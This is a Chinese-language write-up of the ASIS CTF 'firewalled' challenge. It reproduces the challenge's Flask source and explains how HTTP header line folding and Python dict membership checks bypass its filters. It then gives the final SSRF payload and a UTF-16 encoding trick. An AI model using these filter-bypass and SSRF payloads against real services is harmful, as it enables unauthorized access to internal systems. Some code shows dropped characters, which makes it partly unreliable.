ASISCTF-firewalled复现

2022-10-31 17:39:21 浏览数 (1)

题目描述

给了源码,我们得到一个docker-compose.yml包含两个服务的文件:flag-containerfirewalled-curl。第二个通过 8000 端口暴露在公网上。它们都是基于apache 的flask应用。

docker-compose.yml:

代码语言:javascript复制
version: "3.9"

services:
  flag-container:
    build: ./flag-container
    environment:
      - FLAG=ASIS{test-flag}
    restart: always
  firewalled-curl:
    build: ./firewalled-curl
    ports:
      - "8000:80"
    restart: always

源码:

flag-container:

代码语言:javascript复制
#!/usr/bin/env python3
from flask import Flask,request
import requests
import json
import os

app = Flask(__name__)
application = app
flag = os.environ.get('FLAG')

@app.route('/flag')
def index():
	args = request.args.get('args')

	try:
		r = requests.post('http://firewalled-curl/req',json=json.loads(args)).json()
		if 'request' in r and 'flag' in r['request'] and 'flag' in request.headers['X-Request']:
			return flag
	except:
		pass
	return 'No flag for you :('

if(__name__ == '__main__'):
	app.run(port=8000)

firewalled-curl:

代码语言:javascript复制
#!/usr/bin/env python3
from flask import Flask,Response,request
import time
import socket
import re
import base64
import json

isSafeAscii = lambda s : not re.search(r'[^x20-x7F]',s)# 匿名函数
isSafeHeader = lambda s : isSafeAscii(s)
isSafePath = lambda s : s[0] == '/' and isSafeAscii(s) and ' ' not in s
badHeaderNames = ['encoding','type','charset']
unsafeKeywords = ["flag"]

app = Flask(__name__)
application = app

def isJson(s):
	try:
		json.loads(s)
		return True
	except:
		return False

def checkHostname(name):
	name = str(name)
	port = '80'
	if(':' in name):
		sp = name.split(':')
		name = sp[0]
		port = sp[1]

	if(
		(
		re.search(r'^[a-z0-9][a-z0-9-.] $',name) or
		re.search(r'^[0-9] .[0-9] .[0-9] .[0-9] $',name)
		) and
		0 < int(port) < 0x10000
	):
		return name,int(port)
	return Exception('unsafe port'),Exception('unsafe hostname')

def recvuntil(sock,u):
	r = b''
	while(r[-len(u):] != u):
		r  = sock.recv(1)
	return r

def checkHeaders(headers):# headers类型为 dict
	newHeaders = {}
	if(type(headers) is not dict):
		return Exception('unsafe headers') 
	for headerName in headers:
		headerValue = str(headers[headerName])# 获得 value
		if((isSafeHeader(headerName) and ':' not in headerName) and isSafeHeader(headerValue)):
			isBad = False
			for badHeaderName in badHeaderNames: # ['encoding','type','charset']
				if(badHeaderName in headerName.lower()):
					isBad = True
					break
			# 这个 waf  !!!!
			for badHeaderValue in unsafeKeywords: # ['flag']
				if(badHeaderValue in headerValue.lower()):
					isBad = True
					break
			if(isBad):
				return Exception('bad headers')
			newHeaders[headerName] = headerValue
	return newHeaders

def checkMethod(method):
	if(method in ['GET','POST']):
		return method
	return Exception('unsafe method')

def checkPath(path):
	if(isSafePath(path)):
		return path
	return Exception('unsafe path')

def checkJson(j):
	if(type(j) == str):
     # 这个 waf  !!!!    json中不能有 flag
		for u in unsafeKeywords:
			if(u in j.lower()):
				return False
	elif(type(j) == list):
		for entry in j:
			if(not checkJson(entry)):
				return False 
	elif(type(j) == dict):
		for entry in j:
			if(not checkJson(j[entry])):
				return False 
	else:
		return True

	return True

@app.route('/req',methods=['POST'])
def req():
	params = request.json

	hostname,port = checkHostname(params['host'])
	headers = checkHeaders(params['headers'])
	method = checkMethod(params['method'])
	path = checkPath(params['path'])
	returnJson = bool(params['returnJson'])
	body = None

	for p in [hostname,headers,body,method,path]:
		if(isinstance(p,Exception)):
			return {'success':False,'error':str(p)}

	if(method == 'POST'):
		body = str(params['body'])


	httpRequest = f'{method} {path} HTTP/1.1rn' # /flag?args={}
	if(port == 80):
		httpRequest = f'Host: {hostname}rn'
	else:
		httpRequest = f'Host: {hostname}:{port}rn'
	httpRequest = f'Connection: closern'
	if(body):
		httpRequest = f'Content-Length: {str(len(body))}rn'
	for headerName in headers:
		httpRequest = f'{headerName}: {headers[headerName]}rn'
	httpRequest  = 'rn'
	if(body):
		httpRequest  = body  					# 获取请求体body,是否可以构造?
	httpRequest = httpRequest.encode()

	with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as sock:
		sock.settimeout(1)
		sock.connect((hostname,port))
		sock.sendall(httpRequest)

		statusCode = int(recvuntil(sock,b'n').split(b' ')[1])
		headers = {}
		line = recvuntil(sock,b'n').strip()
		while(line):
			headerName = line[:line.index(b':')].strip().decode()
			headerValue = line[line.index(b':') 1:].strip().decode()
			if(isSafeHeader(headerName) and isSafeHeader(headerValue)):
				headers[headerName] = headerValue
			line = recvuntil(sock,b'n').strip()
		bodyLength = min(int(headers['Content-Length']),0x1000)
		body = b''
		while(len(body) != bodyLength):
			body  = sock.recv(1)
		sock.close()

		if(isJson(body.decode())):
			if(not checkJson(json.loads(body.decode()))):
				return {'success':False,'error':'unsafe json'}
			headers['Content-Type'] = 'application/json'
		else:
			headers['Content-Type'] = 'application/octet-stream'

		if(returnJson):
			body = base64.b64encode(body).decode()
			return {'statusCode':statusCode,'headers':headers,'body':body,'req':httpRequest.decode()}

		resp = Response(body)
		resp.status = statusCode

		for headerName in headers:
			for badHeaderName in badHeaderNames: # ['encoding','type','charset']
				if(badHeaderName not in headerName.lower()):
					resp.headers[headerName] = headers[headerName]
		return resp

@app.route('/')
def index():
	resp = Response('hi')
	resp.headers['Content-Type'] = 'text/plain'
	return resp

if(__name__ == '__main__'):
	app.run(port=8000)

审计代码没啥好说的,就硬看完事了。

分析

不考虑waf的情况下那flag是这么个流程

代码语言:javascript复制
firewalled-curl服务---->flag-container服务---->firewalled-curl服务---->访问自己服务器得到返回---->拿到flag

firewalled-curl服务接受我们的 json 输入并将其转换为原始的 http 1.1 请求。flag位于flag-container服务中。我们可以通过firewalled-curl访问它,因为只有firewalled-curl暴露在互联网上。

Tm8gZmxhZyBmb3IgeW91IDooNo flag for you :( 的base64编码,返回的这个 body 就是访问对应 host 的结果

对于 flag-container 要拿到flag我们要达成两个条件

代码语言:javascript复制
@app.route('/flag')
def index():
	args = request.args.get('args')

	try:
		r = requests.post('http://firewalled-curl/req',json=json.loads(args)).json()
		if 'request' in r and 'flag' in r['request'] and 'flag' in request.headers['X-Request']:
			return flag
	except:
		pass
	return 'No flag for you :('

通过 firewalled-curl 访问内网的 flag-container ,发送给 flag-container 的报文的请求头中含有 X-Request:flag ,但有waf

代码语言:javascript复制
isSafeAscii = lambda s : not re.search(r'[^x20-x7F]',s)# 限制只有可见字符才行
isSafeHeader = lambda s : isSafeAscii(s)
isSafePath = lambda s : s[0] == '/' and isSafeAscii(s) and ' ' not in s
badHeaderNames = ['encoding','type','charset']
unsafeKeywords = ["flag"]
...
...
def checkHeaders(headers):# headers类型为 dict
	newHeaders = {}
	if(type(headers) is not dict):
		return Exception('unsafe headers') 
	for headerName in headers:
		headerValue = str(headers[headerName])# 获得 value
		if((isSafeHeader(headerName) and ':' not in headerName) and isSafeHeader(headerValue)):# 请求头的key不能有 :
			isBad = False
			for badHeaderName in badHeaderNames: # ['encoding','type','charset']
				if(badHeaderName in headerName.lower()):
					isBad = True
					break
            # 检测请求头key:value中的 值(Value)
			for badHeaderValue in unsafeKeywords: # ['flag'],值不能有flag字符串
				if(badHeaderValue in headerValue.lower()):
					isBad = True
					break
			if(isBad):
				return Exception('bad headers')
			newHeaders[headerName] = headerValue
	return newHeaders

请求头对应的key: value 中的 value 不能含有 flag 字符串,即 X-Request 对应的值不能有 flag

通过 GET 传参 agrs ,然后将其 POST 给 firewalled-curl服务,得到返回值,得到的这个返回值是个json数据,且json成功解析后要求满足 checkJson 函数的waf检测,同时在 flag-container 中对应得到的返回值r也要**满足 'request' in r and 'flag' in r['request'] **

但也有waf

代码语言:javascript复制
...
def checkJson(j):
	if(type(j) == str):
     # 这个 waf  !!!!    json中不能有 flag
		for u in unsafeKeywords:
			if(u in j.lower()):
				return False
	elif(type(j) == list):
		for entry in j:
			if(not checkJson(entry)):
				return False 
	elif(type(j) == dict):
		for entry in j:
			if(not checkJson(j[entry])):
				return False 
	else:
		return True

	return True
...
...
while(len(body) != bodyLength):
			body  = sock.recv(1)
		sock.close()

		if(isJson(body.decode())):
			if(not checkJson(json.loads(body.decode()))):
				return {'success':False,'error':'unsafe json'}
			headers['Content-Type'] = 'application/json'
		else:
			headers['Content-Type'] = 'application/octet-stream'

		if(returnJson):# returnJson 为 True时
			body = base64.b64encode(body).decode()
			return {'statusCode':statusCode,'headers':headers,'body':body,'req':httpRequest.decode()}

		resp = Response(body)
		resp.status = statusCode

		for headerName in headers:
			for badHeaderName in badHeaderNames: # ['encoding','type','charset']
				if(badHeaderName not in headerName.lower()):
					resp.headers[headerName] = headers[headerName]
		return resp  # resp 的结果要为 {"request":"flag"}, 但有waf

checkJson 函数会递归的检查得到的 json 数据的 value 是否含有 flag 字符串

由于程序会将得到的json中的 host, path 等进行拼接,转成对应的http/1.1 报文然后通过 socket 套接字发送,而发现hostpath 等没有 checkHeaders函数检测 所以尝试在加入字符 rn 换行注入这种

代码语言:javascript复制
GET / HTTP/1.1
Host: example.com
Key: value

body

但发现限制了字符集

代码语言:javascript复制
def checkHostname(name):
	name = str(name)
	port = '80'
	if(':' in name):
		sp = name.split(':')
		name = sp[0]
		port = sp[1]

	if(
		(
		re.search(r'^[a-z0-9][a-z0-9.-] $',name) or
		re.search(r'^[0-9] .[0-9] .[0-9] .[0-9] $',name)
		) and
		0 < int(port) < 0x10000
	):
		return name,int(port)
	return Exception('unsafe port'),Exception('unsafe hostname')

def checkMethod(method):
	if(method in ['GET','POST']):
		return method
	return Exception('unsafe method')

isSafePath = lambda s : s[0] == '/' and isSafeAscii(s) and ' ' not in s
def checkPath(path):
	if(isSafePath(path)):
		return path
	return Exception('unsafe path')

也不行

解决方案

Flask支持接收折叠头部形式的http报文

第一个点用到了这个

参考 RCF 标准文档 https://datatracker.ietf.org/doc/html/rfc7230#section-3.2.4

代码语言:javascript复制
Historically, HTTP header field values could be extended over
multiple lines by preceding each extra line with at least one space
or horizontal tab (obs-fold).  This specification deprecates such
line folding except within the message/http media type
(Section 8.3.1).  A sender MUST NOT generate a message that includes
line folding (i.e., that has any field-value that contains a match to
the obs-fold rule) unless the message is intended for packaging
within the message/http media type.

从历史上看,HTTP 头字段值可以扩展到通过在每个额外的行前面至少有一个空格或水平制表符来实现多行折叠的消息头。

即如有这样的报文

代码语言:javascript复制
GET / HTTP/1.1
Host: example.com
Key: value1
 value2

body

服务器最终接受到的请求头 key 是这样的 key: value1 value2

等价于这样的报文

代码语言:javascript复制
GET / HTTP/1.1
Host: example.com
Key: value1 value2

body

而从题目源码来看他从json中获得的请求头并没有考虑这点,所以向 /req 发送这样的json

代码语言:javascript复制
{
		"host": "flag-container",
		"headers": {
            "X-Request":"something",
			" flag":"aaa"
         },
		"method": "GET",
		"path": "/flag",
		"returnJson": true
}

上面也分析到获取到的这个json解析成 dict 后会用 checkHeaders 函数 递归检验 headers 字典内的 value,注意其并**不会检验字典的 key **,即请求头的key " flag" 不会被waf。

如上,没有出发waf,程序将整理好的 http/1.1 报文通过socket套接字发送给 flag-container

整理下

代码语言:javascript复制
GET /flag HTTP/1.1
Host: flag-container
Connection: close
X-Request: something
 flag: aaa

发送给 flag-container 后,flag-container 收到的请求头 request.headers 中就存在这样的请求头 {"X-Request": "something flag:aaa"}

这下 'flag' in request.headers['X-Request'] 的条件就满足了,上面第一个问题就解决了。

为了更好的理解,本地测试下

代码语言:javascript复制
from flask import Flask,request
app = Flask(__name__)

@app.route('/flag')
def index():
    print(request.headers)
    
if(__name__ == '__main__'):
	app.run(port=8000)

还是上面的 http 报文,结果

可以发现符合预期,"flag" in request.headers["X-Request"] 满足

python in 关键字的特性

python中的 in 关键字用于检测某个值是否存在于指定的值中,如

"abc" in "aabc123""qwe" in ["aaa", "qwe", "123"],均返回 True

对于 dict 类型的变量,in 关键字有有这样的特性

代码语言:javascript复制
testDict = {"key1": "value1", "key2": "value2"}
print("key1" in testDict)
print("value1" in testDict)
print("value1" in testDict["key1"])

运行结果

in 若用于字典类型数据,则是检测目标字典中是否存在对应的 key 值。

所以对于上面 分析 中的条件2则可以构造得到的 r{"request": {"flag":"aaa"}}

这样满足 'request' in r and 'flag' in r['request']

最后可以在自己服务器上搭建返回 {"request": {"flag":"aaa"}} 即可

exp.json

代码语言:javascript复制
{"request": {"flag":"aaa"}}

对 flag-container 的args传参

代码语言:javascript复制
args={"host":"own_server","headers":{},"method":"GET","path":"/exp.json","returnJson":false}

注意要 url 编码一下

代码语言:javascript复制
args={"host":"own_server","headers":{},"method":"GET","path":"/exp.json","returnJson":false}

最终的payload

post 发送给 /req

代码语言:javascript复制
{
		"host": "flag-container",
		"headers": {"X-Request":"something",
" flag":"aaa"},
		"method": "GET",
		"path": "/flag?args={"host":"own_server","headers":{},"method":"GET","path":"/exp.json","returnJson":false}",
		"returnJson": false
	}

后记

这题第二个条件本文说的其实是一个非预期的解法,预期解是更改JSON文件的编码。如果使用非utf-8编码,则来自 frewalled-curl 的 isJson 函数在 try{} catch {} 中会失败。

使用这样的命令获取 utf-16.json 文件

代码语言:javascript复制
echo {"request":"flag"} > secret.json
iconv -f ASCII -t UTF-16 secret.json -o secret_utf16.json

之后需要删除前 2 个 byte-order-mark 字节,以便 body.decode() 不会失败。来自 flag-container 的 Response.json()仍然会正确猜测编码 (https://github.com/psf/requests/blob/main/requests/utils.py#L950) 但是 firewalled-curl 中会检测 json 失败。

参考

https://sh1yo.art/ctf/firewalled/

0 人点赞